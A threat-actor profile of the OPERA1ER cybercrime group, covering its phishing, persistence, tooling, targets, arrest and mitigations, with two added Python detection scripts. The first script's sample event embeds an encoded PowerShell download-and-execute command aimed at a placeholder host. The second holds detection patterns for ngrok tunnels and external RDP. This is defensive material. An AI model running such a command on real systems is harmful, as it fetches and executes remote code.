
Threat Actor Profile: OPERA1ER

Overview 

OPERA1ER is a financially motivated cybercriminal group that has been active since at least 2018, conducting a series of highly targeted intrusions across multiple regions, with a strong concentration in Africa and parts of Asia and Latin America. Between 2018 and 2022, the group successfully carried out more than 30 confirmed attacks, stealing a minimum of $11 million, with some estimates suggesting total losses could reach as high as $30 million. 

Figure: OPERA1ER aliases (Data Source: Cyble Vision)

Unlike many advanced threat groups that rely on proprietary malware, OPERA1ER distinguishes itself through its consistent use of publicly available tools, commodity malware, and “living-off-the-land” techniques. This approach allows the group to blend into normal system activity, reducing the likelihood of detection while maintaining operational flexibility.  

Their campaigns are primarily focused on financial theft, often targeting organizations repeatedly and leveraging compromised infrastructure to expand their reach into additional victim environments. 

Operational Activity and Attack Lifecycle

Figure: OPERA1ER attack chain mapped with MITRE ATT&CK techniques (Data Source: Cyble Vision)

OPERA1ER campaigns typically begin with carefully crafted phishing operations designed to gain initial access to victim environments. These phishing attempts may involve malicious attachments, embedded links, or social engineering tactics that impersonate trusted entities. In some cases, attackers manipulate email headers or spoof sender identities to bypass both human scrutiny and automated defenses. 

Once access is established, the group relies heavily on built-in system utilities and legitimate administrative tools to execute commands and maintain persistence. Tools such as command-line interpreters, PowerShell, and scheduled task mechanisms are frequently abused to ensure recurring execution of malicious payloads. This method allows attackers to operate without introducing highly suspicious binaries into the environment. 

Persistence is often achieved through boot or logon initialization scripts, as well as event-triggered execution mechanisms. These techniques enable malicious code to run automatically in response to system events, often under elevated privilege contexts such as SYSTEM or service accounts. 

To expand their foothold, OPERA1ER actors leverage credential harvesting and valid account abuse, enabling lateral movement across networks. By using legitimate credentials, they can bypass access controls and maintain long-term access while appearing as authorized users. Additionally, process injection techniques are sometimes employed to execute malicious code within trusted processes, further obscuring detection. 
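The persistence and lateral-movement behaviours described above (scheduled tasks running script interpreters as SYSTEM, event-triggered execution through WMI subscriptions, PsExec service installs) leave well-known traces in Windows event logs. The following Python triage script is an added example, not code from the original profile or from Cyble; it runs rule checks over a handful of constructed, SIEM-normalised event records. The field names (`event_id`, `command`, `run_as`, `consumer_type`, and so on) are an assumed normalisation, not any vendor's schema, and the sample events are fabricated for illustration.

```python
"""Rule-based triage of normalised Windows event records for OPERA1ER-style
living-off-the-land persistence. Added example with an assumed record layout."""
import base64
import re
from typing import Optional

# Event sources used: Security 4698 (scheduled task created), System 7045
# (service installed) and Sysmon 20 (WMI event consumer registered).
TASK_CREATED, SERVICE_INSTALLED, WMI_CONSUMER = 4698, 7045, 20
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta")
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64 UTF-16LE script.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed sample payload and records (not real telemetry); the hostname is a
# reserved placeholder, not an indicator from the page.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
SAMPLE_EVENTS = [
    {"event_id": 4698, "user": "CORP\\svc_backup", "task_name": "\\Microsoft\\Windows\\Updater",
     "run_as": "SYSTEM",
     "command": "powershell.exe -nop -w hidden -EncodedCommand "
                + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()},
    {"event_id": 7045, "user": "CORP\\admin01", "service_name": "PSEXESVC",
     "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"event_id": 20, "user": "CORP\\admin01", "consumer_type": "CommandLineEventConsumer",
     "consumer_name": "Updater", "command": "cmd.exe /c C:\\ProgramData\\run.bat"},
    # Benign task: no interpreter, not SYSTEM, nothing encoded -> no finding expected.
    {"event_id": 4698, "user": "CORP\\it_ops", "task_name": "\\Backups\\Nightly",
     "run_as": "CORP\\svc_backup", "command": "C:\\Program Files\\Backup\\backup.exe --full"},
]


def decode_encoded_command(command: str) -> Optional[str]:
    """Return the UTF-16LE script behind a PowerShell -EncodedCommand, or None."""
    m = ENCODED_FLAG.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> list:
    """Return zero or more findings (technique, event_id, detail) for one record."""
    findings = []
    eid = event.get("event_id")
    cmd = event.get("command", "")
    if eid == TASK_CREATED:
        uses_interpreter = any(t in cmd.lower() for t in INTERPRETERS)
        decoded = decode_encoded_command(cmd)
        # Encoded payloads are always worth a look; plain interpreters only when run as SYSTEM.
        if decoded is not None or (uses_interpreter and event.get("run_as") == "SYSTEM"):
            findings.append({"technique": "T1053 Scheduled Task/Job", "event_id": eid,
                             "detail": f"task {event.get('task_name')} runs an interpreter as "
                                       f"{event.get('run_as')}; decoded: {decoded!r}"})
    elif eid == SERVICE_INSTALLED:
        name = event.get("service_name", "").upper()
        path = event.get("image_path", "").lower()
        if name == "PSEXESVC" or "psexesvc" in path:
            findings.append({"technique": "T1569.002 Service Execution (PsExec)", "event_id": eid,
                             "detail": f"{event.get('user')} installed {name} from {path}"})
    elif eid == WMI_CONSUMER and event.get("consumer_type") == "CommandLineEventConsumer":
        findings.append({"technique": "T1546.003 WMI Event Subscription", "event_id": eid,
                         "detail": f"consumer {event.get('consumer_name')} executes {cmd}"})
    return findings


def triage(events: list) -> list:
    """Run classify() over a batch of records and flatten the findings."""
    return [f for e in events for f in classify(e)]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["technique"], "|", finding["detail"])
```

The rules are deliberately narrow (PsExec's default service name, an encoded PowerShell task, a command-line WMI consumer) so that they can be tuned per environment; the benign backup task in the sample shows the false-positive boundary the thresholds are meant to respect.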

Targeting Profile 

OPERA1ER operates across a wide geographic footprint, with confirmed activity in countries including Argentina, Bangladesh, Burkina Faso, Benin, Cameroon, Gabon, Mali, Niger, Nigeria, Paraguay, Sierra Leone, Senegal, Togo, and Uganda.  

Figure: Countries and regions targeted by OPERA1ER (Data Source: Cyble Vision)

The group concentrates its efforts primarily on the Banking, Financial Services, and Insurance (BFSI) sector, as well as telecommunications providers, exploiting the financial systems and transaction infrastructures within these industries to maximize monetary gain. 

A distinctive feature of OPERA1ER’s campaigns is their tendency to repeatedly target previously compromised victims. In multiple instances, the group has leveraged existing access to infiltrate additional organizations, effectively transforming victim infrastructure into a staging ground for subsequent attacks and expanding their operational reach.

Malware and Tooling 

Rather than developing custom malware, OPERA1ER relies on a diverse toolkit of publicly available and commercially accessible tools.  

Figure: Malware families and tools used by OPERA1ER (Source: Cyble Vision)

Key Tools and Malware Families 

  • Metasploit: A widely used penetration testing framework developed in collaboration with the open-source community and Rapid7. While intended for defensive security testing, OPERA1ER uses Metasploit to exploit known vulnerabilities, gain unauthorized access, and execute post-exploitation activities.  
  • Ngrok: A legitimate reverse proxy service that creates secure tunnels to internal systems. The group uses Ngrok to expose compromised systems to the internet, enabling remote control, lateral movement, and data exfiltration. This technique has also been observed in operations linked to other threat actors such as UNC3944 and Scattered Spider.  
  • PsExec: A Microsoft Sysinternals tool created by Mark Russinovich. OPERA1ER abuses PsExec to execute commands on remote systems, facilitating lateral movement and privilege escalation within compromised networks.  
  • Revealer Keylogger: A simple yet effective keylogging tool capable of capturing keystrokes, including credentials entered without masking. It is typically deployed covertly to harvest sensitive user information.  
  • Agent Tesla: A .NET-based remote access trojan and spyware active since 2014. Delivered primarily through phishing campaigns, it supports credential theft through keylogging, clipboard capture, and screen recording.  
  • BitRAT: A low-cost remote access trojan (approximately $20 on underground markets) that provides capabilities such as credential theft, DDoS attacks, and surveillance. It is commonly distributed via phishing emails and trojanized software. 
  • BlackNET RAT: An open-source botnet framework developed in VB.NET, offering extensive functionality including file exfiltration, password theft, and cryptojacking.  
  • RDPWrap: A tool that enables multiple concurrent Remote Desktop Protocol (RDP) sessions without modifying system files. OPERA1ER may exploit this to maintain unauthorized remote access and facilitate lateral movement.  
  • VenomRAT: A remote access trojan derived from QuasarRAT, featuring anti-detection mechanisms such as ScrubCrypt. It is often distributed through malicious PowerShell commands or disguised files, including shortcut-based delivery mechanisms.  

Law Enforcement Actions and Disruption 

A breakthrough in efforts to counter OPERA1ER came in mid-2023, when the threat actor faced a setback following a coordinated international effort known as Operation Nervone. In early June 2023, authorities in Côte d’Ivoire arrested a suspected senior member of the group, with the operation publicly announced on 5 July 2023.  

This marked a major disruption to a network responsible for over 30 cyberattacks and financial losses estimated between $11 million and $30 million. The operation was the result of close collaboration between INTERPOL, AFRIPOL and local authorities, supported by intelligence from the United States Secret Service and Booz Allen Hamilton.  

By combining insights across agencies, investigators were able to trace the group’s activities, identify operational patterns, and locate key individuals.  

Strategic Assessment 

OPERA1ER represents a highly pragmatic cybercriminal operation that prioritizes efficiency and scalability over technical novelty. By leveraging legitimate tools and widely available malware, the group minimizes its operational footprint while maintaining effectiveness across diverse targets. 

Their ability to repeatedly exploit compromised environments and repurpose victim infrastructure demonstrates a high level of operational discipline and resource optimization. Additionally, their focus on financially lucrative sectors such as BFSI underscores a clear and consistent motivation centered on monetary gain. 

While not considered an advanced persistent threat in the traditional sense, OPERA1ER’s methods are effective precisely because they exploit common security gaps, particularly in credential management, phishing awareness, and monitoring of legitimate tool usage. 

Conclusion 

OPERA1ER is a cyber threat to financial and telecommunications organizations, using phishing, credential abuse, and legitimate tools to operate stealthily and steal millions in funds. Organizations can defend against such actors by enhancing user awareness, monitoring tool usage, and leveraging advanced threat intelligence.

Figure: Cyble Threat Actor Library (Source: Cyble Vision)

Cyble’s AI-powered platform provides real-time insights, predictive analytics, and automated responses, helping security teams detect and neutralize threats like OPERA1ER before they escalate. Schedule a personalized demo with Cyble today to strengthen your cybersecurity posture and stay ahead of cyber threats like OPERA1ER. 

Recommendations and Mitigation Strategies 

  • Implement Advanced Email Security: Deploy phishing detection, anti-spam, and attachment scanning to block malicious emails and links used by OPERA1ER.  
  • Enforce Multi-Factor Authentication (MFA): Require MFA for all accounts, especially administrative and financial systems, to prevent unauthorized access from stolen credentials.  
  • Regularly Patch and Update Systems: Keep operating systems, applications, and network devices up to date to reduce exposure to known vulnerabilities exploited by the group.  
  • Monitor and Restrict Administrative Tools: Track the use of legitimate tools like PsExec, Metasploit, and RDPWrap, and limit access to authorized personnel only.  
  • Network Segmentation: Isolate critical financial and telecommunications systems from general networks to limit lateral movement in case of compromise.  
  • Deploy Endpoint Detection and Response (EDR): Use EDR solutions to detect abnormal processes, keylogging attempts, or unauthorized remote access activity.  
  • Credential Management: Regularly rotate privileged credentials and monitor for unauthorized use or unusual login activity.  
  • Conduct Security Awareness Training: Educate employees about phishing, social engineering, and safe practices to reduce the risk of initial access.  
  • Continuous Traffic and Anomaly Monitoring: Analyze network traffic for unusual patterns, including unexpected remote connections, VPN tunnels, or reverse proxies like ngrok.  
  • Leverage Threat Intelligence: Integrate platforms like Cyble to gain real-time insights into OPERA1ER activity, identify emerging threats, and automate proactive responses. 
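Two of the recommendations above, monitoring legitimate tool usage and watching traffic for reverse proxies such as ngrok, and the Ngrok entry in the tooling list, come down to the same network-side check: connections to tunnel-service domains and remote-access protocols leaving the corporate address space. The Python script below is an added example, not code from the original profile or from Cyble. It parses constructed proxy/firewall log lines in a simplified `timestamp src dst:port proto host` layout (not any product's real format); the ngrok domain suffixes and the internal address ranges are assumptions a defender would replace with what their own environment actually uses.

```python
"""Scan constructed proxy/firewall log lines for reverse-tunnel and external
remote-access indicators. Added example with an assumed log layout."""
import ipaddress
import re

# Assumed list of ngrok service domains; other tunnelling services would be added here.
TUNNEL_DOMAIN_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app", ".ngrok.dev", ".ngrok.com")
# Assumed corporate address space; RDP (3389) to anything outside it is flagged.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
RDP_PORT = 3389

# Constructed sample log (documentation/test addresses only). Line 5 is internal RDP
# and should not be flagged; lines 2-4 should.
SAMPLE_LOG = """\
2024-01-10T08:00:01Z 10.1.2.3 93.184.216.34:443 tcp www.example.com
2024-01-10T08:00:05Z 10.1.2.3 203.0.113.10:443 tcp 3f2a-203-0-113-10.ngrok-free.app
2024-01-10T08:00:09Z 10.1.2.9 203.0.113.20:443 tcp tunnel.ngrok.com
2024-01-10T08:01:00Z 10.1.2.3 198.51.100.7:3389 tcp -
2024-01-10T08:01:30Z 10.1.2.4 10.1.5.5:3389 tcp -
"""
LINE = re.compile(r"^(\S+) (\S+) (\S+):(\d+) (\S+) (\S+)$")


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines that do not fit the layout."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ts, src, dst, port, proto, host = m.groups()
    return {"ts": ts, "src": src, "dst": dst, "port": int(port), "proto": proto,
            "host": None if host == "-" else host.lower()}


def is_internal(ip: str) -> bool:
    """True when the address falls inside the assumed corporate ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_tunnel_domain(host: str) -> bool:
    """Match the apex domain or any subdomain of the configured tunnel services."""
    return any(host == suffix.lstrip(".") or host.endswith(suffix) for suffix in TUNNEL_DOMAIN_SUFFIXES)


def find_indicators(log_text: str) -> list:
    """Return flagged records with a short reason string attached."""
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["host"] and is_tunnel_domain(rec["host"]):
            hits.append({**rec, "reason": "tunnel-service domain"})
        elif rec["port"] == RDP_PORT and not is_internal(rec["dst"]):
            hits.append({**rec, "reason": "RDP to external address"})
    return hits


if __name__ == "__main__":
    for hit in find_indicators(SAMPLE_LOG):
        print(hit["ts"], hit["src"], "->", hit["dst"], hit["reason"])
```

Matching on domain suffixes catches both the per-tunnel hostnames handed out to free-tier users and the agent's own control connection; pairing that with an allow-list of approved remote-access egress is what turns this from a hunt query into a standing alert.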

MITRE ATT&CK Techniques Associated with OPERA1ER

Figure: MITRE ATT&CK Techniques (Source: Cyble Vision)

  • Phishing (T1566 | Initial Access): Sent malicious emails or links using spoofing and social engineering to trick users into installing malware or exposing credentials.  
  • Scheduled Task/Job (T1053 | Execution): Used OS task scheduling to run malware at startup or on a recurring basis, hiding it under trusted processes.  
  • Command and Scripting Interpreter (T1059 | Execution): Ran scripts and commands via PowerShell, Unix shells, Python, or JavaScript, delivered through email or C2.  
  • Boot/Logon Scripts (T1037 | Privilege Escalation): Leveraged scripts executed at boot or login to persist and escalate privileges.  
  • Event Triggered Execution (T1546 | Privilege Escalation): Used system or cloud event triggers to automatically execute malicious code and elevate privileges.  
  • Obfuscated Files (T1027 | Defense Evasion): Encrypted, encoded, or split files to hide malware from detection.  
  • Process Injection (T1055 | Defense Evasion): Injected code into legitimate processes to evade security monitoring and gain higher privileges.  
  • Valid Accounts (T1078 | Defense Evasion): Abused existing or inactive accounts to access, persist, and move laterally across networks.  
  • Acquire Infrastructure (T1583 | Resource Development): Rented or purchased servers, domains, and botnets to stage and conceal operations.  
  • Establish Accounts (T1585 | Resource Development): Created fake accounts and personas on third-party services to support long-term targeting. 